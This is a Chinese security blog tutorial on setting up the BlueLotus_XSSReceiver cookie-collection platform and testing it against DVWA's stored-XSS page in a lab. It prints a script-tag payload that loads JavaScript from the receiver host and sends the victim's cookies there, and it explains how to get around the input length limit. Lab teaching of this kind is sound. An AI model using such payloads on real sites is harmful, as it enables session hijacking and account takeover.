专栏首页乌鸦安全打Cookie小工具_BlueLotus_XSSReceiver

打Cookie小工具_BlueLotus_XSSReceiver

✎ 阅读须知

乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经授权,不得用于其他。

01 什么是打cookie?

网上其实已经有很多非常好的解释了,在这里一句话总结下就是:在你访问的页面上执行了一次JS代码,这次代码执行之后可以获取你当前已经登录某个网站的cookie,并将该cookie发送到攻击者指定的网站,攻击者利用当前的cookie来登录你的网站。

攻击者用来接收cookie的平台就叫做xss 平台,在网上这种平台其实非常多,但是如果用过的同学应该有些感触,有些平台存在黑吃黑的情况(懂得都懂),而且好多渗透测试任务都是保密的,不可能去使用第三方平台。

02 cookie接收平台

一般来说,cookie接收平台现在比较好的平台是xss-platform,很多平台都在其基础上进行二次开发(或者叫做类似,笔者也不是很清楚谁比谁先),适合多人使用。

当然,这里就还有一个比较小,但是有时候同样够用的平台BlueLotus_XSSReceiver,这个平台的优点就是足够小,不需要数据库。缺点就是一般只适合一个人使用。

2.1 BlueLotus_XSSReceiver安装

BlueLotus_XSSReceiver安装的时候是需要php运行环境的,这里我就以win7下的phpstudy为例,主要是足够简单。

首先安装phpstudy,这里我安装的是2018版本,这个非常简单,在这里就不演示了。

BlueLotus_XSSReceiver的代码放在其www目录下,在这里可以将文件夹修改名字,我这里就不修改了,然后直接访问部署phpstudy的ip+文件夹名字。

直接访问

http://10.211.55.9/BlueLotus_XSSReceiver/

直接点击安装,在这里我只修改了后台需要登录的密码,在这里注意这个登录密码自己一定要记住,后期理论上是无法找回的。

点击提交即可,在这里本来是可以配置SMTP邮箱提醒的,但是我试过很多次,发现执行不了。

安装成功

03 XSS打Cookie示例

打开之后是这样的,在这里先建立一个xss来试试

在公共模版里面 default.js里面是可以获取后台地址和cookie的,所以一会使用这个就好了。

在我的JS里面,按照如下步骤进行,在第5步的时候会提示你需要先新增,新增之后再生成payload

继续,在这里就是你的payload了,当然这里的是没有经过任何变形的,如果需要变形,看右侧。

<script src="http://10.211.55.9/BlueLotus_XSSReceiver/myjs/test_XSS.js"></script>

然后在win7里面开一个dvwa来测试xss

DVWA的等级设置为low级别。

然后来到XSS(Stored)

<script src="http://10.211.55.9/BlueLotus_XSSReceiver/myjs/test_XSS.js"></script>

放入评论中去,当然在这里对输入长度有限制,可以使用F12来修改下代码长度限制即可。

使用开发者工具写入,然后保存

保存之后刷新该界面

此时在XSS平台内部就有一个提示,打到了Cookie。

打开之后,就会看到这些信息,获取cookie成功。

04 补充

BlueLotus_XSSReceiver工具只是一个非常简单的XSS获取工具,感谢开发作者的付出,以上过程仅仅用来非常简单的演示。

如果你想下载该工具,有以下几种方式:

  1. 后台回复: xss工具 下载
  2. 在我的GitHub上进行下载,地址为:
https://github.com/crow821/

本文分享自微信公众号 - 乌鸦安全(crowsec),作者:crowsec

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2021-10-03

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Java工具集-Cookie工具类

    cwl_java
  • 实现小型打包工具

    hey,各位宝宝,最近的疫情很严重,大家尽量就不要到外面浪了,好好在家做个安静的宝宝吧。不得不出门时也一定要戴口罩哦!照顾好自己,望平安... ...

    用户3258338
  • parcel 中小型项目打包工具

    mcq
  • python实现py打包exe小工具

    写的python代码,有时候需要进行打包操作,但是又不记得打包指令,为此捣鼓一个打包的小工具,方便快速打包py文件(小工具还可以继续优化,比如加密、反编译等)。...

    用户6367961
  • 提取Chrome中Cookie工具分享

    这个工具将从Google Chrome浏览器中提取Cookie,是一个.NET程序集,可以在C2中通过工具如PoshC2使用或CobaltStrike的命令。

    FB客服
  • 打印product所有attachment 具体信息的小工具

    执行结果显示该product的所有attachment的guid,相对路径,创建者和创建时间:

    Jerry Wang
  • Java工具集-打码工具(MarkUtil)

    cwl_java
  • Cookiel劫持测试工具 – Cookie Injecting Tools

    Cookie Injecting Tools 是一款简单的开源cookie利用工具,是Chrome浏览器上开发的一个扩展插件,能够灵活地进行SQL注入测试,编辑...

    FB客服
  • 小工具

    官方地址:https://github.com/dzxx36gyy/nali-ipip

    keepyan
  • 使用node-webkit实现打包工具的小结

    之前一直使用的hta在开发工具,最近转到node-webkit上了,对比一下二者的优劣势。hta单个文件,体积较小,但有兼容性的问题(兼容ie6、7、8就行了...

    meteoric
  • 用Python制作一个打字训练小工具

    说道程序员,你会想到什么呢?有人认为程序员象征着高薪,有人认为程序员都是死肥宅,还有人想到的则是996和 ICU。

    Python编程之家
  • 一个查看Cookie的便捷工具——EditThisCookie

    用户2149234
  • LinqPad小工具

    LINQPad 也是一个很好的学习LINQ的工具,包含《C# 3.0 in a Nutshell》一书中200个示例,可以使用LINQPad感受LINQ的超酷功...

    跟着阿笨一起玩NET
  • rlwrap 小工具

    yum install readline readline-devel rlwrap -y

    二狗不要跑
  • python小工具

    http://blog.csdn.net/pipisorry/article/details/46754515

    用户7886150
  • 7.12 Git 工具 - 打包

    虽然我们已经了解了网络传输 Git 数据的常用方法(如 HTTP,SSH 等),但还有另外一种不太常见却又十分有用的方式。

    shaonbean
  • Fat jar打包工具

    Fat Jar Eclipse Plug-In是一个可以将Eclipse Java Project的所有资源打包进一个可执行jar文件的小工具,可以方便的完成各...

    阳光岛主
  • Python小工具-sitemap转换工具

    周五公司运营同事,给我发过来8个网站的sitemap文件,都是xml格式的,这个也是网站地图最常见的格式。同时呢,这个项目有移动端网址,需要将sitemap文件...

    小白程序猿
  • 打印product所assign的product category和hierarchy的小工具

    Created by Jerry Wang on Aug 15, 2014 Go to start of metadata 输入product ID之后打印p...

    Jerry Wang

扫码关注云+社区

领取腾讯云代金券